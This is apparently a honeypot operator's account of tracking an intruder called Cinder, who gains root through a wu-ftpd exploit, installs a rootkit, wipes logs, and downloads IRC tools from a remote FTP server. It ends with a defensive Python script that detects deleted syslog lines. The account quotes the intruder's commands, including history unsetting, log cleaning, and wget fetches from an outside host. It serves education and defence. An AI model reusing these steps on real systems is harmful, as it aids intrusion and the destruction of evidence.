Cinder

The third kiddie to enter my realm calls himself Cinder. He seems to be an Italian kiddo. On July 7th, at 19:55, Cinder connects to port 21 of my honeypot. After running the 7530wurm exploit (see the page about MiCrobul), which gave him immediate root access, he grabs a .tgz file from his FTP space at interfree.it.

    unset HISTFILE

After untarring the kit he installs it with a simple ./install. It contains trojanned binaries 'crontab', 'df', 'dir', 'du', 'find', 'vdir', 'ifconfig', 'in.telnetd', 'killall', 'ls', 'netstat', 'ps', 'pstree', 'syslogd' and 'tcpd', a backdoor SSHD and the Adore kernel module. 'akit' stands for Akira kit, from the install:

    # Hello.

As you can see, it was written just a few months ago. I will put it online in a few days for your education. Anyway, with this installed all his incoming telnet and ssh connections are invisible, as are his psybnc, eggdrop, dsniff, sshd, etc. Let's take a look at the logs I hide for him >:)

At 20:17, not long after cracking the box, Cinder connects to his backdoor sshd on port 20673:

    [root@hostname /root]# unset HISTFILE
    usage ./illusion <string/ip/user> <on/off>
    [root@hostname .. cin]# ./illusion 195 on

First, he hides his tracks by unsetting the shell's history and using 'illusion'. Illusion is a shellscript which cleans logs, so Cinder removed all the logged lines containing '195'. After covering his tracks he checks whether his connection and processes are hidden:

    [root@hostname .. cin]# netstat
    [root@hostname .. cin]# ps -aux

No kiddo can ever hack a box without installing some IRC-related programs. Cinder just neeeeds his eggdrops.

    [root@hostname .. cin]# wget ftp://CinderVII:CENSORED@213.158.72.39/eggdrop1.6.2.tar.gz

After configuring the just-downloaded eggdrop he tries to run it:

    [root@hostname eggdrop1.6.2]# ./eggdrop -m eggdrop2

Too bad dude, no tcl around. No worries for Cinder, he continues his siege just as if the eggdrop was running fine. Not that running eggdrops has high priority when wu-ftpd is still vulnerable.

    [root@hostname eggdrop1.6.2]# cd ..

How nice, he fixes my broken wu-ftpd. I should be very thankful for that. No sshd, imapd or bind to patch though. Anyway, now he's safe. Time to install psybnc!

    [root@hostname .. cin]# lynx ftp://CinderVII:CENSORED@213.158.72.39/psyBNC2.2.1-linux-i86-static.tar.gz

Well.. that's that. A running psybnc connected to IRCnet. The channel he's on seems to be a private channel where he stores his bouncers and eggdrops. Mighty useful if you ask me. Of course he needs to check whether his newly cracked box can run mirkforces too. Well, sorry, it won't work. First, I don't forward incoming packets for any other addresses in the honeypot's subnet. Secondly, my ISP's router won't even know those extra 252 IPs are there, since the box is on my LAN. Third, I firewall.
It's July 8th, 17:36 CEST now. I just read the mail abuse@interfree.it sent me as a reply to my abuse mail about Cinder's hacking tools stored on their FTP. This was the reply:

    (sorry for my poor English) This user has been removed.
    Best regards

Let's hope he doesn't have a backup :)

I've put up a page which explains some tools Cinder uses. It takes a lot of time to 'analyse' them, so there's not much to see just now. But anyway, here's the page, have fun.

(July 15th, 20:47 CEST. Just a note that I'm still updating the explanation of Cinder's tools. You can see some stuff about a rootkit for IRIX there now, as well as other things. I also got a mail back from Cinder's ISP. I quote: "due disciplinary measures about our customer are on the way.")

(July 15th, 23:40 CEST. Wrote a little explanation about edenkitbsd.tar.gz.)
I think honeypot 2 was a success. I got hold of many tools the standard scriptkiddie uses, pestered the kiddo a bit, and had fun. I think the explanations you can read on this page may be useful for those who don't know much about how kiddies operate. Besides that, I wasn't able to find much info on Google about the kits I explained, which means that I might well be the first to explain them. Not that I want to be the first to boost my ego; no, it might be useful for other people to learn and do something with that knowledge. With simple counter-measures this hack would be easily detected. Now if only all sysadmins had some clue..
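One of those simple counter-measures, and the one that catches the './illusion 195 on' step above: keep a copy of syslog the intruder cannot reach (off-box, or hidden as the author did) and diff it against the on-box file. This is an added example, not the page's or akit's code; the log lines and the 195.x address are constructed samples, and since the kit replaces syslogd itself, the reference copy has to come from outside the compromised daemon.

```python
"""Spot log lines a cleaner like 'illusion' deleted (added example, not from the
page or the akit/illusion tools). Assumes a hidden or remote syslog copy the
intruder cannot edit; the kit ships its own syslogd, so the on-box daemon is not
trustworthy. All log lines and the 195.x address are constructed samples."""
from collections import Counter

# Constructed sample: the protected reference copy.
REFERENCE_LOG = """\
Jul  7 19:55:02 honey ftpd[7530]: connection from 195.51.100.23
Jul  7 19:55:09 honey ftpd[7530]: FTP LOGIN FROM 195.51.100.23 [195.51.100.23], ftp
Jul  7 19:58:41 honey PAM_pwdb[801]: (login) session opened for user operator
Jul  7 20:17:30 honey sshd[2077]: Accepted password for root from 195.51.100.23 port 1033
Jul  7 20:20:00 honey CRON[2101]: (root) CMD (run-parts /etc/cron.hourly)
"""

# Constructed sample: the local copy after './illusion 195 on' ran.
LOCAL_LOG = """\
Jul  7 19:58:41 honey PAM_pwdb[801]: (login) session opened for user operator
Jul  7 20:20:00 honey CRON[2101]: (root) CMD (run-parts /etc/cron.hourly)
"""


def removed_lines(reference: str, local: str) -> list[str]:
    """Reference lines missing locally; counts are compared so a line logged
    twice and deleted once is still reported (a set difference would miss it)."""
    missing = Counter(reference.splitlines()) - Counter(local.splitlines())
    out: list[str] = []
    for line in reference.splitlines():
        if missing[line] > 0:
            out.append(line)
            missing[line] -= 1
    return out


def common_tokens(lines: list[str]) -> set[str]:
    """Tokens shared by every removed line, i.e. the cleaner's likely search key.
    Month, day, time and host (the first four syslog fields) are skipped."""
    if not lines:
        return set()
    return set.intersection(*(set(line.split()[4:]) for line in lines))


if __name__ == "__main__":
    gone = removed_lines(REFERENCE_LOG, LOCAL_LOG)
    print(f"{len(gone)} line(s) removed; shared token(s): {common_tokens(gone)}")
    for line in gone:
        print("  -", line)
```

On the sample data the three deleted lines share exactly one token, the intruder's address, which is the string the cleaner was given.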